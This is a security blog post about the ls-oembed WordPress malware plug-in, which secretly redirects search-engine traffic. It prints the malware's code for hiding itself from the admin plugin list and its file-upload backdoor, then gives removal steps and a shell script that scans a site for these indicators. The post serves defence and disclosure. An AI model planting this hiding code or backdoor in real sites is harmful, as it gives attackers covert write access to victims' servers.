
WordPress malware ls-oembed plug-in damage is growing

All access via search engines is redirected to overseas sites and the number of accesses drastically decreases

Be alert if the number of visits suddenly drops and all traffic arriving through search engines is redirected to some other site.
This type of hacking is called redirect hacking, and the hackers are possibly being paid for the traffic they fraudulently send to the other site.

The ls-oembed plug-in is secretly installed

This plug-in is not displayed on the management screen, so the administrator cannot tell whether it is installed.
If the plug-in is present in the plugins folder (for example, when you look at it via FTP), we recommend that you clean the malware from your site.

Let’s look at the code inside the plug-in.

// hide the plug-in from everyone except the main admin (start)
// Filter callback registered on 'all_plugins': removes this plug-in from the
// list shown on the Plugins screen unless the request carries the hidden
// admin's login name as a GET parameter, or the current user is that admin.
function SECURITYFIREWALL_hide($plugins) {
    if( $_GET[SECURITYFIREWALL__ADMIN_LOGIN] == 1 ) {
        return $plugins;
    }
    $user = wp_get_current_user();
    if( $user->data->user_login === SECURITYFIREWALL__ADMIN_LOGIN ) {
        return $plugins;
    }
    if( is_plugin_active( SECURITYFIREWALL__PLUGIN ) ) {
        unset( $plugins[ SECURITYFIREWALL__PLUGIN ] );
    }
    return $plugins;
}
add_filter('all_plugins', 'SECURITYFIREWALL_hide');

This code is part of the plug-in. The function prevents the plug-in from appearing on the management screen. Since the comments are in Russian, the malware may be of Russian origin.

Backdoor generation function included in the plug-in

This plug-in also has a function that writes the following code into the WordPress upload folder.

if (isset($_POST['upload'])){
    // Mode 1: save an uploaded file under the directory given in the 'path' POST field.
    if ($_POST['upload']=='1'){
        $uploadfile = $_POST['path'].$_FILES['uploadfile']['name'];
        if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile))
            {echo 'ok';}
        else {echo $_FILES['uploadfile']['error'];}
    }
    // Mode 2: append the raw 'uploadfile' POST field to the file named in 'path'.
    if ($_POST['upload']=='2'){
        $fp=fopen($_POST['path'],'a');
        fwrite($fp, "\r\n");
        fwrite($fp, $_POST['uploadfile']);
        fclose($fp);
        echo 'ok';
    }
}
// Any request without the 'upload' field is redirected two directories up.
else {header('Location: ../../');}

This code is a backdoor that lets anyone place arbitrary files in the WordPress directory without permission.

How to deal with malware ls-oembed plugin

Since this malware has a backdoor function, files can be freely read and written through the backdoor once a site is infected, so the entire website also needs to be disinfected by experts. To prevent major tampering in the meantime, the backdoor can be removed for the time being by the following method.
● Connect to the wp-content/plugins folder with FTP software or similar and check whether there is a folder called ls-oembed. (If there is, delete the folder.)
● The backdoor written by the plug-in was often placed as wpcsesapps.php in the wp-content folder. If this file is also present, delete it.
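The two checks above, as an added example that is not part of the original post: a POSIX shell function that looks for the ls-oembed folder and the wpcsesapps.php file the post names, and also greps every PHP file under the site for the two code fragments shown above (the all_plugins hiding filter and the move_uploaded_file-to-POST-path backdoor). The fixture builder creates harmless stand-in files that carry only those strings; the script assumes find, grep and paths without whitespace.

```shell
#!/bin/sh
# Added example (not from the original post): check a WordPress root for
# the ls-oembed indicators the post names. Folder and file names are the
# post's; the grep strings come from the two code fragments shown above.
# Assumes POSIX sh, find and grep, and paths without whitespace.

scan_wp_root() {
    root="$1"; hits=0
    # Indicator 1: the hidden plug-in folder.
    if [ -d "$root/wp-content/plugins/ls-oembed" ]; then
        echo "FOUND plug-in folder: $root/wp-content/plugins/ls-oembed"; hits=$((hits + 1))
    fi
    # Indicator 2: the file the plug-in drops into wp-content.
    if [ -f "$root/wp-content/wpcsesapps.php" ]; then
        echo "FOUND dropped file: $root/wp-content/wpcsesapps.php"; hits=$((hits + 1))
    fi
    # Indicator 3: any PHP file hiding a plug-in through the all_plugins filter.
    for f in $(find "$root" -type f -name '*.php' -exec grep -lF "add_filter('all_plugins'" {} + 2>/dev/null || true); do
        echo "FOUND plug-in hiding filter: $f"; hits=$((hits + 1))
    done
    # Indicator 4: any PHP file that moves an upload to a POST-supplied path.
    for f in $(find "$root" -type f -name '*.php' -exec grep -lF 'move_uploaded_file(' {} + 2>/dev/null || true); do
        if grep -qF "\$_POST['path']" "$f"; then
            echo "FOUND upload backdoor: $f"; hits=$((hits + 1))
        fi
    done
    [ "$hits" -eq 0 ]   # exit status 0 = clean, 1 = indicators present
}

# Constructed fixture for a dry run: harmless stand-ins that carry only the
# strings above, not the malware itself.
make_fixture() {
    mkdir -p "$1/wp-content/plugins/ls-oembed" "$1/wp-content/plugins/clean"
    cat > "$1/wp-content/plugins/ls-oembed/ls-oembed.php" <<'EOF'
<?php add_filter('all_plugins', 'SECURITYFIREWALL_hide');
EOF
    cat > "$1/wp-content/wpcsesapps.php" <<'EOF'
<?php $u = $_POST['path'] . $_FILES['f']['name']; move_uploaded_file($_FILES['f']['tmp_name'], $u);
EOF
    echo '<?php echo "clean";' > "$1/wp-content/plugins/clean/clean.php"
}

# Usage: sh scan.sh /path/to/wordpress
if [ $# -eq 1 ]; then
    scan_wp_root "$1" && echo "no ls-oembed indicators found"
fi
```

A hit from indicators 3 or 4 outside the two named locations means the dropped file was renamed or copied elsewhere, which is why the post recommends a full clean-up rather than just deleting the two paths.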
